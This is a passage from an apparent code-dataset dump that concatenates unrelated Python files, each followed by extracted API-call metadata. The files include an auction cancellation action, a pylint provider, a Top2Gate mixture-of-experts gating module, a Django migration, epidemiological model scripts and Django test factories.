10)\n', (9791, 9814), False, 'import torch\n'), ((6835, 6854), 'torch.sum', 'torch.sum', (['segBatch'], {}), '(segBatch)\n', (6844, 6854), False, 'import torch\n')] |
from openprocurement.auctions.core.utils import (
log_auction_status_change
)
from openprocurement.auctions.geb.constants import (
AUCTION_STATUSES_FOR_CLEAN_BIDS_IN_CANCELLATION
)
from openprocurement.auctions.geb.managers.changers.base import (
BaseAction
)
class CancellationActivationAction(BaseAction):
"""
Cancellation Activation action
when auction owner activate cancellation (patch status to 'active'):
- auction.status will set to 'cancelled'
- if procedure in statuses ['active.tendering', 'active.enquiry', 'active.auction']
delete all bids
"""
validators = []
@classmethod
def demand(cls, request, context):
"""
Constructor method. If it is reason of action
this method return instance of Action
"""
# check if patch is for activating cancellation
new_status = request.validated['json_data'].get('status')
if context.status == 'pending' and new_status == 'active':
return cls
return False
def act(self):
auction = self.request.auction
# pendify auction status
status = 'cancelled'
auction.status = status
log_auction_status_change(self.request, self.context, status)
# clean bids after cancellation procedure
auction_status = self.request.validated['auction_src']['status']
if auction_status in AUCTION_STATUSES_FOR_CLEAN_BIDS_IN_CANCELLATION:
auction.bids = []
| [
"openprocurement.auctions.core.utils.log_auction_status_change"
] | [((1212, 1273), 'openprocurement.auctions.core.utils.log_auction_status_change', 'log_auction_status_change', (['self.request', 'self.context', 'status'], {}), '(self.request, self.context, status)\n', (1237, 1273), False, 'from openprocurement.auctions.core.utils import log_auction_status_change\n')] |
import sys
try:
from archan import Provider, Argument, DomainMappingMatrix, Logger
from pylint.lint import Run
class LoggerWriter:
def __init__(self, level):
self.level = level
def write(self, message):
if message != '\n':
self.level('from pylint: ' + message)
class PylintProvider(Provider):
"""Pylint provider for Archan."""
identifier = 'archan_pylint.PylintProvider'
name = 'Pylint Provider: Issues per Module'
description = 'Number of Pylint messages per module.'
argument_list = (
Argument('pylint_args', list, 'Pylint arguments as a list.'),
)
def get_data(self, pylint_args=None):
"""
Provide matrix data for Pylint messages in a set of packages.
Args:
pylint_args (list): the arguments to pass to Pylint.
depth (int): the depth of the matrix to generate.
Returns:
archan.DSM: instance of archan DSM.
"""
logger = Logger.get_logger(__name__)
pylint_args = pylint_args or []
sys.stdout = LoggerWriter(logger.debug)
sys.stderr = LoggerWriter(logger.warning)
try:
run = Run(pylint_args, do_exit=False)
except TypeError:
run = Run(pylint_args, exit=False)
sys.stdout = sys.__stdout__
sys.sterr = sys.__stderr__
entities = []
data = []
for k, v in run.linter.stats['by_module'].items():
entities.append(k)
data.append([sum(v.values())])
entities.append('Messages')
return DomainMappingMatrix(data=data, entities=entities)
except ImportError:
class PyLintProvider:
"""Empty provider, please install Archan and Pylint."""
| [
"archan.DomainMappingMatrix",
"archan.Logger.get_logger",
"pylint.lint.Run",
"archan.Argument"
] | [((619, 679), 'archan.Argument', 'Argument', (['"""pylint_args"""', 'list', '"""Pylint arguments as a list."""'], {}), "('pylint_args', list, 'Pylint arguments as a list.')\n", (627, 679), False, 'from archan import Provider, Argument, DomainMappingMatrix, Logger\n'), ((1093, 1120), 'archan.Logger.get_logger', 'Logger.get_logger', (['__name__'], {}), '(__name__)\n', (1110, 1120), False, 'from archan import Provider, Argument, DomainMappingMatrix, Logger\n'), ((1759, 1808), 'archan.DomainMappingMatrix', 'DomainMappingMatrix', ([], {'data': 'data', 'entities': 'entities'}), '(data=data, entities=entities)\n', (1778, 1808), False, 'from archan import Provider, Argument, DomainMappingMatrix, Logger\n'), ((1312, 1343), 'pylint.lint.Run', 'Run', (['pylint_args'], {'do_exit': '(False)'}), '(pylint_args, do_exit=False)\n', (1315, 1343), False, 'from pylint.lint import Run\n'), ((1396, 1424), 'pylint.lint.Run', 'Run', (['pylint_args'], {'exit': '(False)'}), '(pylint_args, exit=False)\n', (1399, 1424), False, 'from pylint.lint import Run\n')] |
# Copyright (C) 2019 Intel Corporation
# SPDX-License-Identifier: BSD-3-Clause
import logging
import collections
log = logging.getLogger('codebasin')
class TreeWalker():
"""
Generic tree walker class.
"""
def __init__(self, _tree, _node_associations):
self.tree = _tree
self._node_associations = _node_associations
| [
"logging.getLogger"
] | [((121, 151), 'logging.getLogger', 'logging.getLogger', (['"""codebasin"""'], {}), "('codebasin')\n", (138, 151), False, 'import logging\n')] |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.9 on 2018-01-09 14:58
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('daiquiri_files', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='directory',
name='depth',
field=models.IntegerField(default=0),
),
migrations.AlterField(
model_name='directory',
name='path',
field=models.CharField(blank=True, help_text='Path of the directory.', max_length=256, verbose_name='Path'),
),
]
| [
"django.db.models.CharField",
"django.db.models.IntegerField"
] | [((397, 427), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)'}), '(default=0)\n', (416, 427), False, 'from django.db import migrations, models\n'), ((550, 656), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'help_text': '"""Path of the directory."""', 'max_length': '(256)', 'verbose_name': '"""Path"""'}), "(blank=True, help_text='Path of the directory.', max_length\n =256, verbose_name='Path')\n", (566, 656), False, 'from django.db import migrations, models\n')] |
# Copyright (c) Facebook, Inc. and its affiliates. All rights reserved.
#
# This source code is licensed under the BSD license found in the
# LICENSE file in the root directory of this source tree.
# Implementation of Top2Gating described in https://arxiv.org/pdf/2006.16668.pdf
# Code is inspired by Top2GatingOnLogits from lingvo:
# https://github.com/tensorflow/lingvo/blob/21b8106c5f1d30a196c98eedc441d4fd70833b11/lingvo/core/moe_layers.py#L477
from typing import Callable, Dict, Tuple
import torch
from torch import Tensor
import torch.nn.functional as F
gumbel_map: Dict[torch.device, Callable] = {}
def gumbel_rsample(shape: Tuple, device: torch.device) -> Tensor:
gumbel = gumbel_map.get(device)
if gumbel is None:
one = torch.tensor(1.0, device=device)
zero = torch.tensor(0.0, device=device)
gumbel = torch.distributions.gumbel.Gumbel(zero, one).rsample # type: ignore
gumbel_map[device] = gumbel
return gumbel(shape)
def top2gating(logits: torch.Tensor) -> Tuple[Tensor, Tensor, Tensor]:
"""Implements Top2Gating on logits."""
gates = F.softmax(logits, dim=1)
# gates has shape of SE
num_tokens = gates.shape[0]
num_experts = gates.shape[1]
# capacity = 2S/E
capacity = 2 * num_tokens // num_experts
assert num_tokens % num_experts == 0
# Create a mask for 1st's expert per token
indices1_s = torch.argmax(gates, dim=1)
mask1 = F.one_hot(indices1_s, num_classes=num_experts)
# Create a mask for 2nd's expert per token using Gumbel-max trick
# https://timvieira.github.io/blog/post/2014/07/31/gumbel-max-trick/
logits_w_noise = logits + gumbel_rsample(logits.shape, device=logits.device)
# Replace top-expert with min value
logits_except1 = logits_w_noise.masked_fill(mask1.bool(), float("-inf"))
indices2_s = torch.argmax(logits_except1, dim=1)
mask2 = F.one_hot(indices2_s, num_classes=num_experts)
# Compute locations in capacity buffer
locations1 = torch.cumsum(mask1, dim=0) - 1
locations2 = torch.cumsum(mask2, dim=0) - 1
# Update 2nd's location by accounting for locations of 1st
locations2 += torch.sum(mask1, dim=0, keepdim=True)
# Compute l_aux
me = torch.mean(gates, dim=0)
ce = torch.mean(mask1.float(), dim=0)
l_aux = torch.mean(me * ce)
# Remove locations outside capacity from mask
mask1 *= torch.lt(locations1, capacity)
mask2 *= torch.lt(locations2, capacity)
# Store the capacity location for each token
locations1_s = torch.sum(locations1 * mask1, dim=1)
locations2_s = torch.sum(locations2 * mask2, dim=1)
# Normalize gate probabilities
mask1_float = mask1.float()
mask2_float = mask2.float()
gates1_s = torch.einsum("se,se->s", gates, mask1_float)
gates2_s = torch.einsum("se,se->s", gates, mask2_float)
denom_s = gates1_s + gates2_s
# Avoid divide-by-zero
denom_s = torch.clamp(denom_s, min=torch.finfo(denom_s.dtype).eps)
gates1_s /= denom_s
gates2_s /= denom_s
# Calculate combine_weights and dispatch_mask
gates1 = torch.einsum("s,se->se", gates1_s, mask1_float)
gates2 = torch.einsum("s,se->se", gates2_s, mask2_float)
locations1_sc = F.one_hot(locations1_s, num_classes=capacity)
locations2_sc = F.one_hot(locations2_s, num_classes=capacity)
combine1_sec = torch.einsum("se,sc->sec", gates1, locations1_sc)
combine2_sec = torch.einsum("se,sc->sec", gates2, locations2_sc)
combine_weights = combine1_sec + combine2_sec
dispatch_mask = combine_weights.bool()
return l_aux, combine_weights, dispatch_mask
class Top2Gate(torch.nn.Module):
"""Gate module which implements Top2Gating as described in Gshard_.
::
gate = Top2Gate(model_dim, num_experts)
l_aux, combine_weights, dispatch_mask = gate(input)
.. Gshard_: https://arxiv.org/pdf/2006.16668.pdf
Args:
model_dim (int):
size of model embedding dimension
num_experts (ints):
number of experts in model
"""
wg: torch.nn.Linear
def __init__(self, model_dim: int, num_experts: int,) -> None:
super().__init__()
self.wg = torch.nn.Linear(model_dim, num_experts, bias=False)
def forward(self, input: torch.Tensor) -> Tuple[Tensor, Tensor, Tensor]: # type: ignore
logits = self.wg(input)
return top2gating(logits)
| [
"torch.mean",
"torch.distributions.gumbel.Gumbel",
"torch.finfo",
"torch.argmax",
"torch.nn.functional.one_hot",
"torch.lt",
"torch.nn.functional.softmax",
"torch.einsum",
"torch.cumsum",
"torch.nn.Linear",
"torch.sum",
"torch.tensor"
] | [((1109, 1133), 'torch.nn.functional.softmax', 'F.softmax', (['logits'], {'dim': '(1)'}), '(logits, dim=1)\n', (1118, 1133), True, 'import torch.nn.functional as F\n'), ((1401, 1427), 'torch.argmax', 'torch.argmax', (['gates'], {'dim': '(1)'}), '(gates, dim=1)\n', (1413, 1427), False, 'import torch\n'), ((1440, 1486), 'torch.nn.functional.one_hot', 'F.one_hot', (['indices1_s'], {'num_classes': 'num_experts'}), '(indices1_s, num_classes=num_experts)\n', (1449, 1486), True, 'import torch.nn.functional as F\n'), ((1846, 1881), 'torch.argmax', 'torch.argmax', (['logits_except1'], {'dim': '(1)'}), '(logits_except1, dim=1)\n', (1858, 1881), False, 'import torch\n'), ((1894, 1940), 'torch.nn.functional.one_hot', 'F.one_hot', (['indices2_s'], {'num_classes': 'num_experts'}), '(indices2_s, num_classes=num_experts)\n', (1903, 1940), True, 'import torch.nn.functional as F\n'), ((2162, 2199), 'torch.sum', 'torch.sum', (['mask1'], {'dim': '(0)', 'keepdim': '(True)'}), '(mask1, dim=0, keepdim=True)\n', (2171, 2199), False, 'import torch\n'), ((2230, 2254), 'torch.mean', 'torch.mean', (['gates'], {'dim': '(0)'}), '(gates, dim=0)\n', (2240, 2254), False, 'import torch\n'), ((2309, 2328), 'torch.mean', 'torch.mean', (['(me * ce)'], {}), '(me * ce)\n', (2319, 2328), False, 'import torch\n'), ((2393, 2423), 'torch.lt', 'torch.lt', (['locations1', 'capacity'], {}), '(locations1, capacity)\n', (2401, 2423), False, 'import torch\n'), ((2437, 2467), 'torch.lt', 'torch.lt', (['locations2', 'capacity'], {}), '(locations2, capacity)\n', (2445, 2467), False, 'import torch\n'), ((2537, 2573), 'torch.sum', 'torch.sum', (['(locations1 * mask1)'], {'dim': '(1)'}), '(locations1 * mask1, dim=1)\n', (2546, 2573), False, 'import torch\n'), ((2593, 2629), 'torch.sum', 'torch.sum', (['(locations2 * mask2)'], {'dim': '(1)'}), '(locations2 * mask2, dim=1)\n', (2602, 2629), False, 'import torch\n'), ((2745, 2789), 'torch.einsum', 'torch.einsum', (['"""se,se->s"""', 'gates', 'mask1_float'], {}), "('se,se->s', gates, mask1_float)\n", (2757, 2789), False, 'import torch\n'), ((2805, 2849), 'torch.einsum', 'torch.einsum', (['"""se,se->s"""', 'gates', 'mask2_float'], {}), "('se,se->s', gates, mask2_float)\n", (2817, 2849), False, 'import torch\n'), ((3094, 3141), 'torch.einsum', 'torch.einsum', (['"""s,se->se"""', 'gates1_s', 'mask1_float'], {}), "('s,se->se', gates1_s, mask1_float)\n", (3106, 3141), False, 'import torch\n'), ((3155, 3202), 'torch.einsum', 'torch.einsum', (['"""s,se->se"""', 'gates2_s', 'mask2_float'], {}), "('s,se->se', gates2_s, mask2_float)\n", (3167, 3202), False, 'import torch\n'), ((3223, 3268), 'torch.nn.functional.one_hot', 'F.one_hot', (['locations1_s'], {'num_classes': 'capacity'}), '(locations1_s, num_classes=capacity)\n', (3232, 3268), True, 'import torch.nn.functional as F\n'), ((3289, 3334), 'torch.nn.functional.one_hot', 'F.one_hot', (['locations2_s'], {'num_classes': 'capacity'}), '(locations2_s, num_classes=capacity)\n', (3298, 3334), True, 'import torch.nn.functional as F\n'), ((3354, 3403), 'torch.einsum', 'torch.einsum', (['"""se,sc->sec"""', 'gates1', 'locations1_sc'], {}), "('se,sc->sec', gates1, locations1_sc)\n", (3366, 3403), False, 'import torch\n'), ((3423, 3472), 'torch.einsum', 'torch.einsum', (['"""se,sc->sec"""', 'gates2', 'locations2_sc'], {}), "('se,sc->sec', gates2, locations2_sc)\n", (3435, 3472), False, 'import torch\n'), ((753, 785), 'torch.tensor', 'torch.tensor', (['(1.0)'], {'device': 'device'}), '(1.0, device=device)\n', (765, 785), False, 'import torch\n'), ((801, 833), 'torch.tensor', 'torch.tensor', (['(0.0)'], {'device': 'device'}), '(0.0, device=device)\n', (813, 833), False, 'import torch\n'), ((2002, 2028), 'torch.cumsum', 'torch.cumsum', (['mask1'], {'dim': '(0)'}), '(mask1, dim=0)\n', (2014, 2028), False, 'import torch\n'), ((2050, 2076), 'torch.cumsum', 'torch.cumsum', (['mask2'], {'dim': '(0)'}), '(mask2, dim=0)\n', (2062, 2076), False, 'import torch\n'), ((4188, 4239), 'torch.nn.Linear', 'torch.nn.Linear', (['model_dim', 'num_experts'], {'bias': '(False)'}), '(model_dim, num_experts, bias=False)\n', (4203, 4239), False, 'import torch\n'), ((851, 895), 'torch.distributions.gumbel.Gumbel', 'torch.distributions.gumbel.Gumbel', (['zero', 'one'], {}), '(zero, one)\n', (884, 895), False, 'import torch\n'), ((2950, 2976), 'torch.finfo', 'torch.finfo', (['denom_s.dtype'], {}), '(denom_s.dtype)\n', (2961, 2976), False, 'import torch\n')] |
import errno
import os
from refgenconf import MissingRecipeError
from ubiquerg import is_writable
from .asset_build_packages import asset_build_packages
from .exceptions import MissingFolderError
def _parse_user_build_input(input):
"""
Parse user input specification. Used in build for specific parents and input parsing.
:param Iterable[Iterable[str], ...] input: user command line input,
formatted as follows: [[fasta=txt, test=txt], ...]
:return dict: mapping of keys, which are input names and values
"""
lst = []
for i in input or []:
lst.extend(i)
return (
{x.split("=")[0]: x.split("=")[1] for x in lst if "=" in x}
if lst is not None
else lst
)
def _single_folder_writeable(d):
return os.access(d, os.W_OK) and os.access(d, os.X_OK)
def _writeable(outdir, strict_exists=False):
outdir = outdir or "."
if os.path.exists(outdir):
return _single_folder_writeable(outdir)
elif strict_exists:
raise MissingFolderError(outdir)
return _writeable(os.path.dirname(outdir), strict_exists)
def _raise_missing_recipe_error(recipe):
"""
Raise an error for a missing recipe, when one is requested
:param str recipe: recipe name
:raise MissingRecipeError: always
"""
raise MissingRecipeError(
f"Recipe '{recipe}' not found. Available recipes: "
f"{', '.join(list(asset_build_packages.keys()))}"
)
def _skip_lock(skip_arg, cfg):
"""
If config read lock skip was not forced, check if dir is writable and set
the default to the result
:param bool skip_arg: argument selected on the CLI
:param str cfg: path to the confjg
:return bool: decision -- whether to skip the file lock for read
"""
return is_writable(os.path.dirname(cfg)) if not skip_arg else True
def make_sure_path_exists(path):
"""
Creates all directories in a path if it does not exist.
:param str path: Path to create.
:raises Exception: if the path creation attempt hits an error with
a code indicating a cause other than pre-existence.
"""
try:
os.makedirs(path)
except OSError as exception:
if exception.errno != errno.EEXIST:
raise
| [
"os.makedirs",
"os.path.dirname",
"os.path.exists",
"os.access"
] | [((909, 931), 'os.path.exists', 'os.path.exists', (['outdir'], {}), '(outdir)\n', (923, 931), False, 'import os\n'), ((780, 801), 'os.access', 'os.access', (['d', 'os.W_OK'], {}), '(d, os.W_OK)\n', (789, 801), False, 'import os\n'), ((806, 827), 'os.access', 'os.access', (['d', 'os.X_OK'], {}), '(d, os.X_OK)\n', (815, 827), False, 'import os\n'), ((1068, 1091), 'os.path.dirname', 'os.path.dirname', (['outdir'], {}), '(outdir)\n', (1083, 1091), False, 'import os\n'), ((2147, 2164), 'os.makedirs', 'os.makedirs', (['path'], {}), '(path)\n', (2158, 2164), False, 'import os\n'), ((1802, 1822), 'os.path.dirname', 'os.path.dirname', (['cfg'], {}), '(cfg)\n', (1817, 1822), False, 'import os\n')] |
from django.conf.urls import patterns, include, url
urlpatterns = patterns('',
url(r'^', include('demo.urls')),
url(r'^login/$', 'django.contrib.auth.views.login', {'template_name': 'nuit/generic/login.html'}),
url(r'^logout/$', 'django.contrib.auth.views.logout'),
)
| [
"django.conf.urls.include",
"django.conf.urls.url"
] | [((121, 221), 'django.conf.urls.url', 'url', (['"""^login/$"""', '"""django.contrib.auth.views.login"""', "{'template_name': 'nuit/generic/login.html'}"], {}), "('^login/$', 'django.contrib.auth.views.login', {'template_name':\n 'nuit/generic/login.html'})\n", (124, 221), False, 'from django.conf.urls import patterns, include, url\n'), ((224, 276), 'django.conf.urls.url', 'url', (['"""^logout/$"""', '"""django.contrib.auth.views.logout"""'], {}), "('^logout/$', 'django.contrib.auth.views.logout')\n", (227, 276), False, 'from django.conf.urls import patterns, include, url\n'), ((94, 114), 'django.conf.urls.include', 'include', (['"""demo.urls"""'], {}), "('demo.urls')\n", (101, 114), False, 'from django.conf.urls import patterns, include, url\n')] |
"""
:code:`iceswe.py`
Holdout both iceland and sweden
"""
import pymc3 as pm
from epimodel import EpidemiologicalParameters
from epimodel.preprocessing.data_preprocessor import preprocess_data
import argparse
import pickle
from scripts.sensitivity_analysis.utils import *
import os
os.environ['OMP_NUM_THREADS'] = '1'
os.environ['MKL_NUM_THREADS'] = '1'
os.environ['OPENBLAS_NUM_THREADS'] = '1'
argparser = argparse.ArgumentParser()
add_argparse_arguments(argparser)
if __name__ == '__main__':
args, extras = argparser.parse_known_args()
data = preprocess_data(get_data_path(), last_day='2020-05-30')
data.mask_reopenings()
if 'deaths_only' in args.model_type:
data.remove_regions_min_deaths(5)
data.mask_region('IS')
data.mask_region('SE')
ep = EpidemiologicalParameters()
model_class = get_model_class_from_str(args.model_type)
bd = {**ep.get_model_build_dict(), **parse_extra_model_args(extras)}
pprint_mb_dict(bd)
with model_class(data) as model:
model.build_model(**bd)
ta = get_target_accept_from_model_str(args.model_type)
with model.model:
model.trace = pm.sample(args.n_samples, tune=500, chains=args.n_chains, cores=args.n_chains, max_treedepth=14,
target_accept=ta, init='adapt_diag')
save_cm_trace(f'iceswe.txt', model.trace.CMReduction, args.exp_tag,
generate_base_output_dir(args.model_type, parse_extra_model_args(extras)))
if model.country_specific_effects:
nS, nCMs = model.trace.CMReduction.shape
full_trace = np.exp(
np.log(model.trace.CMReduction) + np.random.normal(size=(nS, nCMs)) * model.trace.CMAlphaScales)
save_cm_trace('iceswe-cs.txt', full_trace, args.exp_tag,
generate_base_output_dir(args.model_type, parse_extra_model_args(extras)))
| [
"pymc3.sample",
"epimodel.EpidemiologicalParameters",
"argparse.ArgumentParser"
] | [((415, 440), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (438, 440), False, 'import argparse\n'), ((795, 822), 'epimodel.EpidemiologicalParameters', 'EpidemiologicalParameters', ([], {}), '()\n', (820, 822), False, 'from epimodel import EpidemiologicalParameters\n'), ((1155, 1293), 'pymc3.sample', 'pm.sample', (['args.n_samples'], {'tune': '(500)', 'chains': 'args.n_chains', 'cores': 'args.n_chains', 'max_treedepth': '(14)', 'target_accept': 'ta', 'init': '"""adapt_diag"""'}), "(args.n_samples, tune=500, chains=args.n_chains, cores=args.\n n_chains, max_treedepth=14, target_accept=ta, init='adapt_diag')\n", (1164, 1293), True, 'import pymc3 as pm\n')] |
import datetime
import random
import factory
import factory.fuzzy as fuzzy
from django.core.files.base import ContentFile
from courses import models
from courses.models import LANGUAGE_CHOICES, PROFILE_CHOICES
from tests.users import factories as users_factories
from users import models as users_models
PROFILE_CHOICES = [x[0] for x in PROFILE_CHOICES]
LANGUAGE_CHOICES = [x[0] for x in LANGUAGE_CHOICES]
class GradeFactory(factory.django.DjangoModelFactory):
class Meta:
model = models.Grade
name = factory.Sequence(lambda n: "Grade %03d" % n)
start_year = factory.Faker('date_object')
supervisor = factory.SubFactory(users_factories.StudentFactory)
profile = fuzzy.FuzzyChoice(PROFILE_CHOICES)
@factory.post_generation
def students(self, create, extracted, **kwargs):
if not create:
return
if extracted:
for student in extracted:
self.students.add(student)
else:
random_students = random.choices(users_models.Student.objects.all(), k=10)
for student in random_students:
self.students.add(student)
class CourseFactory(factory.django.DjangoModelFactory):
class Meta:
model = models.Course
name = factory.Sequence(lambda n: "Course %02d" % n)
description = factory.Faker('text')
head_teacher = factory.SubFactory(users_factories.TeacherFactory)
grade = factory.SubFactory(GradeFactory)
code_meu = '123'
has_exam = False
semester = fuzzy.FuzzyChoice([i for i in range(1, 8)])
language = fuzzy.FuzzyChoice(LANGUAGE_CHOICES)
lecture_hours = fuzzy.FuzzyChoice([i for i in range(1, 40)])
labs_hours = fuzzy.FuzzyChoice([i for i in range(1, 40)])
@factory.post_generation
def teachers(self, create, extracted, **kwargs):
if not create:
return
if extracted:
for teacher in extracted:
self.teachers.add(teacher)
else:
random_teachers = random.choices(users_models.Teacher.objects.all(), k=5)
for teacher in random_teachers:
self.teachers.add(teacher)
class LectureFactory(factory.django.DjangoModelFactory):
class Meta:
model = models.Lecture
course = factory.SubFactory(CourseFactory)
title = fuzzy.FuzzyText(length=16)
description = factory.Faker('text')
date = fuzzy.FuzzyDate(
start_date=datetime.date.today() - datetime.timedelta(days=100),
end_date=datetime.date.today() + datetime.timedelta(days=100),
)
class GroupFactory(factory.django.DjangoModelFactory):
class Meta:
model = models.CourseGroup
name = fuzzy.FuzzyText(length=16)
@factory.post_generation
def students(self, create, extracted, **kwargs):
if not create:
return
if extracted:
for student in extracted:
self.students.add(student)
class LabFactory(factory.django.DjangoModelFactory):
class Meta:
model = models.Laboratory
course = factory.SubFactory(CourseFactory)
group = factory.SubFactory(GroupFactory)
title = fuzzy.FuzzyText(length=16)
description = factory.Faker('text')
date = fuzzy.FuzzyDate(
start_date=datetime.date.today() - datetime.timedelta(days=100),
end_date=datetime.date.today() + datetime.timedelta(days=100),
)
class CourseGroupFactory(factory.django.DjangoModelFactory):
class Meta:
model = models.CourseGroup
course = factory.SubFactory(CourseFactory)
name = fuzzy.FuzzyText(length=16)
class CourseMarkFactory(factory.django.DjangoModelFactory):
class Meta:
model = models.CourseMark
mark = 65
date = fuzzy.FuzzyDate(datetime.date.today())
description = factory.Faker('text')
course = factory.SubFactory(CourseFactory)
student = factory.SubFactory(users_factories.StudentFactory)
teacher = factory.SubFactory(users_factories.TeacherFactory)
class FinalCourseMarkFactory(factory.django.DjangoModelFactory):
class Meta:
model = models.FinalCourseMark
mark = 5
date = fuzzy.FuzzyDate(datetime.date.today())
description = factory.Faker('text')
course = factory.SubFactory(CourseFactory)
student = factory.SubFactory(users_factories.StudentFactory)
teacher = factory.SubFactory(users_factories.TeacherFactory)
class NoticeFactory(factory.django.DjangoModelFactory):
class Meta:
model = models.CourseNotice
course = factory.SubFactory(CourseFactory)
sender = factory.SubFactory(users_factories.TeacherFactory)
title = fuzzy.FuzzyText(length=16)
content = factory.Faker('text')
created_at = fuzzy.FuzzyDate(datetime.date.today())
class AssignmentFactory(factory.django.DjangoModelFactory):
class Meta:
model = models.Assignment
laboratory = factory.SubFactory(LabFactory)
teacher = factory.SubFactory(users_factories.TeacherFactory)
deadline = fuzzy.FuzzyDate(datetime.date.today())
title = fuzzy.FuzzyText(length=16)
content = factory.Faker('text')
class CourseFileFactory(factory.django.DjangoModelFactory):
class Meta:
model = models.CourseFile
name = fuzzy.FuzzyText(length=16)
description = factory.Faker('text')
file = factory.LazyAttribute(
lambda _: ContentFile(
factory.django.ImageField()._make_data(
{'width': 600, 'height': 600}
), 'example.jpg'
)
)
created_at = fuzzy.FuzzyDate(datetime.date.today())
updated_at = fuzzy.FuzzyDate(datetime.date.today()) | [
"factory.django.ImageField",
"factory.Faker",
"factory.fuzzy.FuzzyText",
"users.models.Student.objects.all",
"factory.SubFactory",
"datetime.date.today",
"factory.fuzzy.FuzzyChoice",
"factory.Sequence",
"users.models.Teacher.objects.all",
"datetime.timedelta"
] | [((523, 567), 'factory.Sequence', 'factory.Sequence', (["(lambda n: 'Grade %03d' % n)"], {}), "(lambda n: 'Grade %03d' % n)\n", (539, 567), False, 'import factory\n'), ((585, 613), 'factory.Faker', 'factory.Faker', (['"""date_object"""'], {}), "('date_object')\n", (598, 613), False, 'import factory\n'), ((631, 681), 'factory.SubFactory', 'factory.SubFactory', (['users_factories.StudentFactory'], {}), '(users_factories.StudentFactory)\n', (649, 681), False, 'import factory\n'), ((696, 730), 'factory.fuzzy.FuzzyChoice', 'fuzzy.FuzzyChoice', (['PROFILE_CHOICES'], {}), '(PROFILE_CHOICES)\n', (713, 730), True, 'import factory.fuzzy as fuzzy\n'), ((1263, 1308), 'factory.Sequence', 'factory.Sequence', (["(lambda n: 'Course %02d' % n)"], {}), "(lambda n: 'Course %02d' % n)\n", (1279, 1308), False, 'import factory\n'), ((1327, 1348), 'factory.Faker', 'factory.Faker', (['"""text"""'], {}), "('text')\n", (1340, 1348), False, 'import factory\n'), ((1368, 1418), 'factory.SubFactory', 'factory.SubFactory', (['users_factories.TeacherFactory'], {}), '(users_factories.TeacherFactory)\n', (1386, 1418), False, 'import factory\n'), ((1431, 1463), 'factory.SubFactory', 'factory.SubFactory', (['GradeFactory'], {}), '(GradeFactory)\n', (1449, 1463), False, 'import factory\n'), ((1580, 1615), 'factory.fuzzy.FuzzyChoice', 'fuzzy.FuzzyChoice', (['LANGUAGE_CHOICES'], {}), '(LANGUAGE_CHOICES)\n', (1597, 1615), True, 'import factory.fuzzy as fuzzy\n'), ((2277, 2310), 'factory.SubFactory', 'factory.SubFactory', (['CourseFactory'], {}), '(CourseFactory)\n', (2295, 2310), False, 'import factory\n'), ((2323, 2349), 'factory.fuzzy.FuzzyText', 'fuzzy.FuzzyText', ([], {'length': '(16)'}), '(length=16)\n', (2338, 2349), True, 'import factory.fuzzy as fuzzy\n'), ((2368, 2389), 'factory.Faker', 'factory.Faker', (['"""text"""'], {}), "('text')\n", (2381, 2389), False, 'import factory\n'), ((2687, 2713), 'factory.fuzzy.FuzzyText', 'fuzzy.FuzzyText', ([], {'length': '(16)'}), '(length=16)\n', (2702, 2713), True, 'import factory.fuzzy as fuzzy\n'), ((3060, 3093), 'factory.SubFactory', 'factory.SubFactory', (['CourseFactory'], {}), '(CourseFactory)\n', (3078, 3093), False, 'import factory\n'), ((3106, 3138), 'factory.SubFactory', 'factory.SubFactory', (['GroupFactory'], {}), '(GroupFactory)\n', (3124, 3138), False, 'import factory\n'), ((3151, 3177), 'factory.fuzzy.FuzzyText', 'fuzzy.FuzzyText', ([], {'length': '(16)'}), '(length=16)\n', (3166, 3177), True, 'import factory.fuzzy as fuzzy\n'), ((3196, 3217), 'factory.Faker', 'factory.Faker', (['"""text"""'], {}), "('text')\n", (3209, 3217), False, 'import factory\n'), ((3523, 3556), 'factory.SubFactory', 'factory.SubFactory', (['CourseFactory'], {}), '(CourseFactory)\n', (3541, 3556), False, 'import factory\n'), ((3568, 3594), 'factory.fuzzy.FuzzyText', 'fuzzy.FuzzyText', ([], {'length': '(16)'}), '(length=16)\n', (3583, 3594), True, 'import factory.fuzzy as fuzzy\n'), ((3789, 3810), 'factory.Faker', 'factory.Faker', (['"""text"""'], {}), "('text')\n", (3802, 3810), False, 'import factory\n'), ((3824, 3857), 'factory.SubFactory', 'factory.SubFactory', (['CourseFactory'], {}), '(CourseFactory)\n', (3842, 3857), False, 'import factory\n'), ((3872, 3922), 'factory.SubFactory', 'factory.SubFactory', (['users_factories.StudentFactory'], {}), '(users_factories.StudentFactory)\n', (3890, 3922), False, 'import factory\n'), ((3937, 3987), 'factory.SubFactory', 'factory.SubFactory', (['users_factories.TeacherFactory'], {}), '(users_factories.TeacherFactory)\n', (3955, 3987), False, 'import factory\n'), ((4192, 4213), 'factory.Faker', 'factory.Faker', (['"""text"""'], {}), "('text')\n", (4205, 4213), False, 'import factory\n'), ((4227, 4260), 'factory.SubFactory', 'factory.SubFactory', (['CourseFactory'], {}), '(CourseFactory)\n', (4245, 4260), False, 'import factory\n'), ((4275, 4325), 'factory.SubFactory', 'factory.SubFactory', (['users_factories.StudentFactory'], {}), '(users_factories.StudentFactory)\n', (4293, 4325), False, 'import factory\n'), ((4340, 4390), 'factory.SubFactory', 'factory.SubFactory', (['users_factories.TeacherFactory'], {}), '(users_factories.TeacherFactory)\n', (4358, 4390), False, 'import factory\n'), ((4515, 4548), 'factory.SubFactory', 'factory.SubFactory', (['CourseFactory'], {}), '(CourseFactory)\n', (4533, 4548), False, 'import factory\n'), ((4562, 4612), 'factory.SubFactory', 'factory.SubFactory', (['users_factories.TeacherFactory'], {}), '(users_factories.TeacherFactory)\n', (4580, 4612), False, 'import factory\n'), ((4625, 4651), 'factory.fuzzy.FuzzyText', 'fuzzy.FuzzyText', ([], {'length': '(16)'}), '(length=16)\n', (4640, 4651), True, 'import factory.fuzzy as fuzzy\n'), ((4666, 4687), 'factory.Faker', 'factory.Faker', (['"""text"""'], {}), "('text')\n", (4679, 4687), False, 'import factory\n'), ((4874, 4904), 'factory.SubFactory', 'factory.SubFactory', (['LabFactory'], {}), '(LabFactory)\n', (4892, 4904), False, 'import factory\n'), ((4919, 4969), 'factory.SubFactory', 'factory.SubFactory', (['users_factories.TeacherFactory'], {}), 